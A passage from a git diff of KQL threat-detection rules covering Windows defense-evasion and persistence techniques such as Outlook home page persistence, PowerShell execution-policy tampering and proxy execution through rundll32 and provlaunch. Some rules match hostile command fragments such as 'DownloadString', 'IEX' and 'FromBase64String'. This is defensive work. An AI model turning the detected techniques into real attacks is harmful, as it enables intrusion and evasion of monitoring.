attack.defense-evasion, attack.persistence, attack.t1112 - -DeviceRegistryEvents +// Title: Potential Persistence Via Outlook Home Page +// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand +// Date: 2021-06-09 +// Level: high +// Description: Detects potential persistence activity via outlook home page. +// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 + +DeviceRegistryEvents | where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql index bcf744d7..fe33ee24 100644 --- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql @@ -1,11 +1,11 @@ -// Title: Potential Persistence Via Outlook Today Page -// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand -// Date: 2021-06-10 -// Level: high -// Description: Detects potential persistence activity via outlook today page. -// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112 - -DeviceRegistryEvents +// Title: Potential Persistence Via Outlook Today Page +// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand +// Date: 2021-06-10 +// Level: high +// Description: Detects potential persistence activity via outlook today page. +// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 + +DeviceRegistryEvents | where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql index 1dc9fe8b..0594325f 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql @@ -1,10 +1,10 @@ -// Title: Potential PowerShell Downgrade Attack -// Author: Harish Segar (rule) -// Date: 2020-03-20 -// Level: medium -// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Potential PowerShell Downgrade Attack +// Author: Harish Segar (rule) +// Date: 2020-03-20 +// Level: medium +// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql index eae9983e..8d5f1bf8 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql @@ -1,10 +1,10 @@ -// Title: Potential PowerShell Execution Policy Tampering -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-11 -// Level: medium -// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: Potential PowerShell Execution Policy Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: medium +// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql index d1456edc..2604f176 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql @@ -1,10 +1,10 @@ -// Title: Potential PowerShell Execution Policy Tampering - ProcCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-11 -// Level: high -// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential PowerShell Execution Policy Tampering - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: high +// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql index 596765b3..f994a390 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql @@ -1,11 +1,11 @@ -// Title: Potential PowerShell Execution Via DLL -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018-08-25 -// Level: high -// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. -// This detection assumes that PowerShell commands are passed via the CommandLine. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Potential PowerShell Execution Via DLL +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. +// This detection assumes that PowerShell commands are passed via the CommandLine. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql index acc55b06..6c8473d3 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql @@ -1,12 +1,12 @@ -// Title: Potential PowerShell Obfuscation Via Reversed Commands -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020-10-11 -// Level: high -// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential PowerShell Obfuscation Via Reversed Commands +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: high +// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql index e1323e69..2cf3d628 100644 --- a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql +++ b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql @@ -1,10 +1,10 @@ -// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) -// Date: 2022-12-16 -// Level: high -// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation - -DeviceFileEvents +// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique +// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) +// Date: 2022-12-16 +// Level: high +// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation + +DeviceFileEvents | where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql index ae043a3c..349588db 100644 --- a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql +++ b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql @@ -1,10 +1,10 @@ -// Title: Potential Process Execution Proxy Via CL_Invocation.ps1 -// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova -// Date: 2020-10-14 -// Level: medium -// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Potential Process Execution Proxy Via CL_Invocation.ps1 +// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova +// Date: 2020-10-14 +// Level: medium +// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where ProcessCommandLine contains "SyncInvoke " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql index e6ed551a..aec32e87 100644 --- a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql +++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql @@ -1,10 +1,10 @@ -// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023-08-08 -// Level: high -// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-08-08 +// Level: high +// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql index 97b0dabf..3a401884 100644 --- a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql +++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql @@ -1,10 +1,10 @@ -// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-08-02 -// Level: high -// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceRegistryEvents +// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-08-02 +// Level: high +// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql index 9d71d4f4..887036a8 100644 --- a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql +++ b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql @@ -1,10 +1,10 @@ -// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023-08-08 -// Level: medium -// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-08-08 +// Level: medium +// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql index 57c07bad..98ed62f8 100644 --- a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql +++ b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE -// Author: @neu5ron -// Date: 2019-02-07 -// Level: medium -// Description: Detects potential malicious and unauthorized usage of bcdedit.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003 - -DeviceProcessEvents +// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE +// Author: @neu5ron +// Date: 2019-02-07 +// Level: medium +// Description: Detects potential malicious and unauthorized usage of bcdedit.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql index 6293493e..827d0d78 100644 --- a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql +++ b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql @@ -1,12 +1,12 @@ -// Title: Potential Register_App.Vbs LOLScript Abuse -// Author: Austin Songer @austinsonger -// Date: 2021-11-05 -// Level: medium -// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Other VB scripts that leverage the same starting command line flags - -DeviceProcessEvents +// Title: Potential Register_App.Vbs LOLScript Abuse +// Author: Austin Songer @austinsonger +// Date: 2021-11-05 +// Level: medium +// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Other VB scripts that leverage the same starting command line flags + +DeviceProcessEvents | where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql index cc96e8e1..889834e6 100644 --- a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql +++ b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql @@ -1,12 +1,12 @@ -// Title: Potential Regsvr32 Commandline Flag Anomaly -// Author: Florian Roth (Nextron Systems) -// Date: 2019-07-13 -// Level: medium -// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Administrator typo might cause some false positives - -DeviceProcessEvents +// Title: Potential Regsvr32 Commandline Flag Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2019-07-13 +// Level: medium +// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Administrator typo might cause some false positives + +DeviceProcessEvents | where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql index c81f7dec..52c140d9 100644 --- a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql +++ b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql @@ -1,10 +1,10 @@ -// Title: Potential Rundll32 Execution With DLL Stored In ADS -// Author: Harjot Singh, '@cyb3rjy0t' -// Date: 2023-01-21 -// Level: high -// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 - -DeviceProcessEvents +// Title: Potential Rundll32 Execution With DLL Stored In ADS +// Author: Harjot Singh, '@cyb3rjy0t' +// Date: 2023-01-21 +// Level: high +// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents | where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql index 6990e807..7f1b5c6c 100644 --- a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql +++ b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql @@ -1,10 +1,10 @@ -// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 -// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 -// Date: 2022-05-21 -// Level: medium -// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 +// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 +// Date: 2022-05-21 +// Level: medium +// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql index 76a864cd..04b02374 100644 --- a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql +++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql @@ -1,10 +1,10 @@ -// Title: Potential Signing Bypass Via Windows Developer Features -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-11 -// Level: high -// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential Signing Bypass Via Windows Developer Features +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: high +// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql index 7b5c2d96..82091f61 100644 --- a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql +++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql @@ -1,10 +1,10 @@ -// Title: Potential Signing Bypass Via Windows Developer Features - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-12 -// Level: high -// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: Potential Signing Bypass Via Windows Developer Features - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-12 +// Level: high +// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql index f196d95c..46e88abb 100644 --- a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql +++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious Mofcomp Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-12 -// Level: high -// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. -// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. -// Attackers abuse this utility to install malicious MOF scripts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Potential Suspicious Mofcomp Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 